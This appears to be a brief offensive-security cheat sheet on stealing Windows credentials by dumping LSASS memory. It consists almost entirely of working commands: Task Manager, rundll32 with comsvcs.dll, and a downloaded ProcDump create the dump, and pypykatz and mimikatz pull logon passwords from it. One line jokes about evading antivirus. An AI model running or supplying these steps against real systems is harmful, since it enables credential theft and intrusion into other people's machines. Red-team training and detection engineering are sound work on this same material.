ls ass

LSASS stores credentials that have active logon sessions. Active logon, active logon, active logon.

Create lsass memdump#

Task manager#

  1. Open Task Manager
  2. Select the Processes tab
  3. Find and right click the Local Security Authority Process
  4. Select Create dump file

CLI#

Find LSASS’s PID#

cmd

tasklist /svc

powershell

Get-Process lsass

Create a dump file#

Most AV blocks this. Don’t get caught :D

rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full

ProcDump#

We can also use the ProcDump tool from sysinternals to dump lsass’s memory

First we download the tool and transfer it to target machine

wget https://download.sysinternals.com/files/Procdump.zip
unzip Procdump.zip

Then we can create the dump file

.\procdump.exe -accepteula -ma lsass.exe lsass.dmp

Extracting#

pypykatz#

We use lsa in the command because LSASS is a subsystem of the Local Security Authority, then we specify the data source as a minidump file

pypykatz lsa minidump ./lsass.dmp 

mimikatz.exe#

.\mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"